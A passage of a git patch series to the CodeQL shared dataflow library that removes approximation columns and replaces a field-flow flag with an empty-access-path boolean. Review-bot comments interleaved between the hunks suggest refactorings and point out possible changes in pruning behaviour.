callEdgeArgParamRestricted(call, _, arg, _, _, _) and + callEdgeArgParamRestricted(call, _, arg, _, _) and instanceofCcCall(ctx) and result = viableImplCallContextReducedInlineLate(call, ctx) } 
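Review bot: `callEdgeArgParamRestricted` used to enforce `allowsFieldFlow = true` for a non-empty access path (and `ApNil` for an empty one) itself; it now relies on `PrevStage::callEdgeArgParam(call, c, arg, p, emptyAp)` having applied that restriction already. Only the Stage 1 implementation of `callEdgeArgParam` is visible in this part of the patch, so it is worth confirming that every later stage's implementation upholds the same rule, and stating the rule once as a comment on the signature declaration. The `then` branch also mixes `and`, `or` and a nested `if` without parentheses; wrapping the two alternatives in parentheses would make the grouping obvious to a reader.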
@@ -1791,10 +1780,9 @@ module MakeImpl Lang> { bindingset[call] pragma[inline_late] private predicate callEdgeArgParamRestrictedInlineLate( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp, - ApApprox apa + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - callEdgeArgParamRestricted(call, c, arg, p, emptyAp, apa) + callEdgeArgParamRestricted(call, c, arg, p, emptyAp) } bindingset[call, ctx] @@ -1809,7 +1797,7 @@ module MakeImpl Lang> { private predicate viableImplArgNotCallContextReduced( DataFlowCall call, ArgNodeEx arg, Cc outercc ) { - callEdgeArgParamRestricted(call, _, arg, _, _, _) and + callEdgeArgParamRestricted(call, _, arg, _, _) and instanceofCc(outercc) and viableImplNotCallContextReducedInlineLate(call, outercc) } @@ -1828,7 +1816,7 @@ module MakeImpl Lang> { ) and not outBarrier(arg, state) and not inBarrier(p, state) and - callEdgeArgParamRestrictedInlineLate(call, inner, arg, p, emptyAp, apa) + callEdgeArgParamRestrictedInlineLate(call, inner, arg, p, emptyAp) } pragma[inline] @@ -2072,10 +2060,9 @@ module MakeImpl Lang> { private module FwdTypeFlow = TypeFlow; private predicate flowIntoCallApaTaken( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, ApApprox apa + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - PrevStage::callEdgeArgParam(call, c, arg, p, allowsFieldFlow, apa) and + PrevStage::callEdgeArgParam(call, c, arg, p, emptyAp) and FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) } 
@@ -2177,16 +2164,16 @@ module MakeImpl Lang> { pragma[nomagic] private predicate flowThroughIntoCall( - DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, boolean allowsFieldFlow, Ap argAp, Ap ap + DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, Ap argAp, Ap ap ) { - exists(ApApprox argApa, Typ argT, TypOption argStored | + exists(ApApprox argApa, Typ argT, TypOption argStored, boolean emptyArgAp | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), pragma[only_bind_into](argStored), ap) and - flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, allowsFieldFlow, argApa) and + flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), pragma[only_bind_into](argStored)) and - if allowsFieldFlow = false then argAp instanceof ApNil else any() + if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false ) } @@ -2194,10 +2181,10 @@ module MakeImpl Lang> { private predicate flowIntoCallAp( DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, Ap ap ) { - exists(ApApprox apa, boolean allowsFieldFlow | - flowIntoCallApaTaken(call, c, arg, p, allowsFieldFlow, apa) and - fwdFlow(arg, _, _, _, _, ap, apa, _) and - if allowsFieldFlow = false then ap instanceof ApNil else any() + exists(boolean emptyAp | + flowIntoCallApaTaken(call, c, arg, p, emptyAp) and + fwdFlow(arg, _, _, _, _, ap, _, _) and + if ap instanceof ApNil then emptyAp = true else emptyAp = false ) } 
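Review bot: The last conjunct of flowThroughIntoCall spells out the nil test as `if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false`, and the same conversion is repeated in flowIntoCallAp in the next hunk and again in revFlowParamToReturn, parameterMayFlowThrough and callEdgeArgParam later in this patch. A single helper would keep the encoding of "empty access path" in one place, for example `bindingset[ap] private boolean isNil(Ap ap) { if ap instanceof ApNil then result = true else result = false }` (the name is only a suggestion), so that each site reads `emptyArgAp = isNil(argAp)`. Since the boolean is now the only access-path information handed to `PrevStage::callEdgeArgParam`, one inverted copy would presumably change which call edges survive pruning without any compile-time signal.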
@@ -2282,7 +2269,7 @@ module MakeImpl Lang> { // flow through a callable exists(DataFlowCall call, ParamNodeEx p, Ap innerReturnAp | revFlowThrough(call, returnCtx, p, state, _, returnAp, ap, innerReturnAp) and - flowThroughIntoCall(call, node, p, _, ap, innerReturnAp) + flowThroughIntoCall(call, node, p, ap, innerReturnAp) ) or // flow out of a callable @@ -2424,10 +2411,13 @@ module MakeImpl Lang> { private predicate revFlowParamToReturn( ParamNodeEx p, FlowState state, ReturnPosition pos, Ap returnAp, Ap ap ) { - revFlow(pragma[only_bind_into](p), state, TReturnCtxMaybeFlowThrough(pos), - apSome(returnAp), pragma[only_bind_into](ap)) and - parameterFlowThroughAllowed(p, pos.getKind()) and - PrevStage::parameterMayFlowThrough(p, getApprox(ap)) + exists(boolean emptyAp | + revFlow(pragma[only_bind_into](p), state, TReturnCtxMaybeFlowThrough(pos), + apSome(returnAp), pragma[only_bind_into](ap)) and + parameterFlowThroughAllowed(p, pos.getKind()) and + PrevStage::parameterMayFlowThrough(p, emptyAp) and + if ap instanceof ApNil then emptyAp = true else emptyAp = false + ) } pragma[nomagic] @@ -2517,13 +2507,21 @@ module MakeImpl Lang> { } pragma[nomagic] - predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap) { + private predicate parameterMayFlowThroughAp(ParamNodeEx p, Ap ap) { exists(ReturnPosition pos | returnFlowsThrough(_, pos, _, _, p, _, ap, _, _, _) and parameterFlowsThroughRev(p, ap, pos, _) ) } + pragma[nomagic] + predicate parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp) { + exists(Ap ap | + parameterMayFlowThroughAp(p, ap) and + if ap instanceof ApNil then emptyAp = true else emptyAp = false + ) + } + pragma[nomagic] private predicate nodeMayUseSummary0(NodeEx n, ParamNodeEx p, FlowState state, Ap ap) { exists(Ap ap0 | 
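Review bot: The new public `parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp)` has no QLDoc, although its second column changed from an access path to a boolean and it is the predicate other stages reach through `PrevStage::`. A one-line comment above its `pragma[nomagic]`, such as `/** Holds if p may flow through with some access path; emptyAp records whether that path is ApNil. */`, would state the contract. The private parameterMayFlowThroughAp could carry a matching line saying that it keeps the precise `Ap` for nodeMayUseSummary. Both predicates are complete within this hunk.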
@@ -2540,7 +2538,7 @@ module MakeImpl Lang> { pragma[nomagic] additional predicate nodeMayUseSummary(NodeEx n, FlowState state, Ap ap) { exists(ParamNodeEx p | - parameterMayFlowThrough(p, ap) and + parameterMayFlowThroughAp(p, ap) and nodeMayUseSummary0(n, p, state, ap) ) } @@ -2561,7 +2559,7 @@ module MakeImpl Lang> { ) { exists(ParamNodeEx p, Ap innerReturnAp | revFlowThrough(call, returnCtx, p, state, _, returnAp, ap, innerReturnAp) and - flowThroughIntoCall(call, arg, p, _, ap, innerReturnAp) + flowThroughIntoCall(call, arg, p, ap, innerReturnAp) ) } @@ -2574,17 +2572,13 @@ module MakeImpl Lang> { } predicate callEdgeArgParam( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, Ap ap + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - exists(FlowState state | + exists(FlowState state, Ap ap | flowIntoCallAp(call, c, arg, p, ap) and revFlow(arg, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and revFlow(p, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and - // allowsFieldFlow has already been checked in flowIntoCallAp, since - // `Ap` is at least as precise as a boolean from Stage 2 and - // forward, so no need to check it again later. - allowsFieldFlow = true + if ap instanceof ApNil then emptyAp = true else emptyAp = false | // both directions are needed for flow-through RevTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or @@ -2606,7 +2600,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { - callEdgeArgParam(call, c, _, _, _, _) + callEdgeArgParam(call, c, _, _, _) } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { @@ -2702,7 +2696,7 @@ module MakeImpl Lang> { apNext = ap and ap instanceof ApNil or - callEdgeArgParam(_, _, node, next, _, ap) and + callEdgeArgParam(_, _, node, next, _) and apNext = ap or callEdgeReturn(_, _, node, _, next, _) and 
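Review bot: In the last hunk on this line (`@@ -2702,7 +2696,7 @@`), the call-edge disjunct `callEdgeArgParam(_, _, node, next, _)` now discards the `emptyAp` column, so nothing in that disjunct relates `ap` to the edge any more; before the change the last argument was `ap` itself. If `ap` is bound by a conjunct outside the hunk this only loosens the filter, but it would still admit steps where the emptiness of the access path disagrees with the edge, which may show up as extra edges in reported paths. Keeping the check would look like `exists(boolean e | callEdgeArgParam(_, _, node, next, e) and if ap instanceof ApNil then e = true else e = false) and`. The enclosing predicate starts and ends outside the hunk, so how `ap` is bound cannot be confirmed from here.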
From d4044062c511096b0f33899e876bb6e459cda7e0 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:38:10 +0100 Subject: [PATCH 0971/1267] Dataflow: Remove ApApprox column in out-flow. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 29 ++++++++++--------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index b3563d95861..4db25288eeb 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1557,7 +1557,8 @@ module MakeImpl Lang> { summaryCtx = TSummaryCtxSome(node, state, t, ap, stored) or // flow out of a callable - fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa, stored) + fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, stored) and + apa = getApprox(ap) or // flow through a callable exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | @@ -1939,19 +1940,19 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowIntoRet( RetNodeEx ret, FlowState state, CcNoCall cc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa, TypOption stored + TypOption stored ) { instanceofCcNoCall(cc) and not outBarrier(ret, state) and - fwdFlow(ret, state, cc, summaryCtx, t, ap, apa, stored) + fwdFlow(ret, state, cc, summaryCtx, t, ap, _, stored) } pragma[nomagic] private predicate fwdFlowOutCand( DataFlowCall call, RetNodeEx ret, CcNoCall innercc, DataFlowCallable inner, NodeEx out, - ApApprox apa, boolean allowsFieldFlow + boolean allowsFieldFlow ) { - fwdFlowIntoRet(ret, _, innercc, _, _, _, apa, _) and + fwdFlowIntoRet(ret, _, innercc, _, _, _, _) and inner = ret.getEnclosingCallable() and ( call = viableImplCallContextReducedReverseInlineLate(inner, innercc) and 
@@ -1964,9 +1965,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowOutValidEdge( DataFlowCall call, RetNodeEx ret, CcNoCall innercc, DataFlowCallable inner, NodeEx out, - CcNoCall outercc, ApApprox apa, boolean allowsFieldFlow + CcNoCall outercc, boolean allowsFieldFlow ) { - fwdFlowOutCand(call, ret, innercc, inner, out, apa, allowsFieldFlow) and + fwdFlowOutCand(call, ret, innercc, inner, out, allowsFieldFlow) and FwdTypeFlow::typeFlowValidEdgeOut(call, inner) and outercc = getCallContextReturn(inner, call) } @@ -1974,11 +1975,11 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowOut( DataFlowCall call, DataFlowCallable inner, NodeEx out, FlowState state, CcNoCall outercc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored + SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow | - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and - fwdFlowOutValidEdge(call, ret, innercc, inner, out, outercc, apa, allowsFieldFlow) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, stored) and + fwdFlowOutValidEdge(call, ret, innercc, inner, out, outercc, allowsFieldFlow) and not inBarrier(out, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -2022,7 +2023,7 @@ module MakeImpl Lang> { DataFlowCall call, DataFlowCallable c, NodeEx node, FlowState state, Cc cc, Typ t, Ap ap, TypOption stored ) { - fwdFlowOut(call, c, node, state, cc, _, t, ap, _, stored) + fwdFlowOut(call, c, node, state, cc, _, t, ap, stored) } pragma[nomagic] 
@@ -3299,10 +3300,10 @@ module MakeImpl Lang> { ) or // flow out of a callable - exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow, ApApprox apa | + exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow | pn1 = TPathNodeMid(ret, state, innercc, summaryCtx, t, ap, stored) and - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and - fwdFlowOutValidEdge(_, ret, innercc, _, node, cc, apa, allowsFieldFlow) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, stored) and + fwdFlowOutValidEdge(_, ret, innercc, _, node, cc, allowsFieldFlow) and not inBarrier(node, state) and label = "" and if allowsFieldFlow = false then ap instanceof ApNil else any() From 262f64f03751b93fc4a4df52e252561a0bc3471f Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:42:07 +0100 Subject: [PATCH 0972/1267] Dataflow: Remove unused columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 4db25288eeb..564810f0951 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1562,7 +1562,7 @@ module MakeImpl Lang> { or // flow through a callable exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) and + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() 
@@ -2098,10 +2098,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowThrough( DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, - Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, ApApprox innerArgApa + Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, - innerArgApa) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, _) } pragma[nomagic] @@ -3136,10 +3135,10 @@ module MakeImpl Lang> { private predicate fwdFlowThroughStep0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, - SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa + SummaryCtxSome innerSummaryCtx ) { fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, - innerSummaryCtx, innerArgApa) + innerSummaryCtx, _) } bindingset[node, state, cc, summaryCtx, t, ap, stored] @@ -3165,14 +3164,14 @@ module MakeImpl Lang> { private predicate fwdFlowThroughStep1( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - TypOption stored, RetNodeEx ret, ApApprox innerArgApa + TypOption stored, RetNodeEx ret ) { exists( FlowState state0, ArgNodeEx arg, SummaryCtxSome innerSummaryCtx, ParamNodeEx p, Typ innerArgT, Ap innerArgAp, TypOption innerArgStored | fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, - innerSummaryCtx, innerArgApa) and + innerSummaryCtx) and innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp, innerArgStored) and pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp, innerArgStored) and pn2 = 
@@ -3189,7 +3188,7 @@ module MakeImpl Lang> { ) { exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, _, stored, - ret, _) and + ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() From 882a9857881a11180b253a95e61a552745925f74 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:43:24 +0100 Subject: [PATCH 0973/1267] Dataflow: Remove useless join. --- .../dataflow/codeql/dataflow/internal/DataFlowImpl.qll | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 564810f0951..914a24dbe2f 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll 
@@ -2166,13 +2166,12 @@ module MakeImpl Lang> { private predicate flowThroughIntoCall( DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, Ap argAp, Ap ap ) { - exists(ApApprox argApa, Typ argT, TypOption argStored, boolean emptyArgAp | + exists(Typ argT, TypOption argStored, boolean emptyArgAp | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), - pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), - pragma[only_bind_into](argStored), ap) and + pragma[only_bind_into](argAp), _, pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and - fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), - pragma[only_bind_into](argApa), pragma[only_bind_into](argStored)) and + fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), _, + pragma[only_bind_into](argStored)) and if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false ) } From a77adadd0179323fa33b376da00bdc349bb27a86 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:46:30 +0100 Subject: [PATCH 0974/1267] Dataflow: Remove more unused columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 48 +++++++++---------- 1 file changed, 23 insertions(+), 25 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 914a24dbe2f..6b24db3ea0c 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll 
@@ -2069,8 +2069,8 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRetFromArg( - RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, ApApprox argApa, - Typ t, Ap ap, ApApprox apa, TypOption stored + RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, Typ t, Ap ap, + ApApprox apa, TypOption stored ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and @@ -2080,7 +2080,6 @@ module MakeImpl Lang> { not outBarrier(ret, state) and kind = ret.getKind() and parameterFlowThroughAllowed(p, kind) and - argApa = getApprox(argAp) and PrevStage::returnMayFlowThrough(ret, kind) ) } @@ -2089,9 +2088,9 @@ module MakeImpl Lang> { private predicate fwdFlowThrough0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, - SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa + SummaryCtxSome innerSummaryCtx ) { - fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, innerArgApa, t, ap, apa, stored) and + fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, t, ap, apa, stored) and fwdFlowIsEntered(call, arg, cc, ccc, summaryCtx, innerSummaryCtx) } @@ -2100,7 +2099,7 @@ module MakeImpl Lang> { DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, _) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) } pragma[nomagic] 
@@ -2141,21 +2140,20 @@ module MakeImpl Lang> { pragma[nomagic] private predicate returnFlowsThrough0( - DataFlowCall call, FlowState state, CcCall ccc, Ap ap, ApApprox apa, RetNodeEx ret, - SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa + DataFlowCall call, FlowState state, CcCall ccc, Ap ap, RetNodeEx ret, + SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, apa, _, ret, innerSummaryCtx, - innerArgApa) + fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, _, _, ret, innerSummaryCtx) } pragma[nomagic] private predicate returnFlowsThrough( RetNodeEx ret, ReturnPosition pos, FlowState state, CcCall ccc, ParamNodeEx p, Typ argT, - Ap argAp, ApApprox argApa, TypOption argStored, Ap ap + Ap argAp, TypOption argStored, Ap ap ) { exists(DataFlowCall call, boolean allowsFieldFlow | - returnFlowsThrough0(call, state, ccc, ap, _, ret, - TSummaryCtxSome(p, _, argT, argAp, argStored), argApa) and + returnFlowsThrough0(call, state, ccc, ap, ret, + TSummaryCtxSome(p, _, argT, argAp, argStored)) and flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -2168,7 +2166,7 @@ module MakeImpl Lang> { ) { exists(Typ argT, TypOption argStored, boolean emptyArgAp | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), - pragma[only_bind_into](argAp), _, pragma[only_bind_into](argStored), ap) and + pragma[only_bind_into](argAp), pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), _, pragma[only_bind_into](argStored)) and 
@@ -2274,7 +2272,7 @@ module MakeImpl Lang> { // flow out of a callable exists(ReturnPosition pos | revFlowOut(_, node, pos, state, _, _, _, ap) and - if returnFlowsThrough(node, pos, state, _, _, _, _, _, _, ap) + if returnFlowsThrough(node, pos, state, _, _, _, _, _, ap) then ( returnCtx = TReturnCtxMaybeFlowThrough(pos) and returnAp = apSome(ap) @@ -2439,7 +2437,7 @@ module MakeImpl Lang> { ) { exists(RetNodeEx ret, FlowState state, CcCall ccc | revFlowOut(call, ret, pos, state, returnCtx, _, returnAp, ap) and - returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, _, ap) and + returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, ap) and matchesCall(ccc, call) ) } @@ -2508,7 +2506,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate parameterMayFlowThroughAp(ParamNodeEx p, Ap ap) { exists(ReturnPosition pos | - returnFlowsThrough(_, pos, _, _, p, _, ap, _, _, _) and + returnFlowsThrough(_, pos, _, _, p, _, ap, _, _) and parameterFlowsThroughRev(p, ap, pos, _) ) } @@ -2545,7 +2543,7 @@ module MakeImpl Lang> { pragma[nomagic] predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind) { exists(ParamNodeEx p, ReturnPosition pos, Ap argAp, Ap ap | - returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, _, ap) and + returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, ap) and parameterFlowsThroughRev(p, argAp, pos, ap) and kind = pos.getKind() ) 
@@ -3133,11 +3131,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowThroughStep0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, - innerSummaryCtx, _) + fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, _, stored, ret, + innerSummaryCtx) } bindingset[node, state, cc, summaryCtx, t, ap, stored] @@ -3162,14 +3160,14 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowThroughStep1( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, DataFlowCall call, Cc cc, - FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - TypOption stored, RetNodeEx ret + FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, + RetNodeEx ret ) { exists( FlowState state0, ArgNodeEx arg, SummaryCtxSome innerSummaryCtx, ParamNodeEx p, Typ innerArgT, Ap innerArgAp, TypOption innerArgStored | - fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, + fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, stored, ret, innerSummaryCtx) and innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp, innerArgStored) and pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp, innerArgStored) and 
@@ -3186,7 +3184,7 @@ module MakeImpl Lang> { FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | - fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, _, stored, + fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, stored, ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and From 22e0636cbad63262545f392b5f53f6ca64b74ce2 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:06:29 +0100 Subject: [PATCH 0975/1267] Dataflow: Insert a few getApprox calls to remove even more columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 58 +++++++++---------- 1 file changed, 29 insertions(+), 29 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 6b24db3ea0c..64630390fec 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1545,7 +1545,8 @@ module MakeImpl Lang> { apa = getApprox(ap) or // flow into a callable without summary context - fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap, stored) and + fwdFlowInNoFlowThrough(node, state, cc, t, ap, stored) and + apa = getApprox(ap) and summaryCtx = TSummaryCtxNone() and // When the call contexts of source and sink needs to match then there's // never any reason to enter a callable except to find a summary. See also 
@@ -1553,7 +1554,8 @@ module MakeImpl Lang> { not Config::getAFeature() instanceof FeatureEqualSourceSinkCallContext or // flow into a callable with summary context (non-linear recursion) - fwdFlowInFlowThrough(node, apa, state, cc, t, ap, stored) and + fwdFlowInFlowThrough(node, state, cc, t, ap, stored) and + apa = getApprox(ap) and summaryCtx = TSummaryCtxSome(node, state, t, ap, stored) or // flow out of a callable @@ -1562,8 +1564,9 @@ module MakeImpl Lang> { or // flow through a callable exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret) and + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, stored, ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and + apa = getApprox(ap) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -1572,7 +1575,7 @@ module MakeImpl Lang> { private newtype TSummaryCtx = TSummaryCtxNone() or TSummaryCtxSome(ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored) { - fwdFlowInFlowThrough(p, _, state, _, t, ap, stored) + 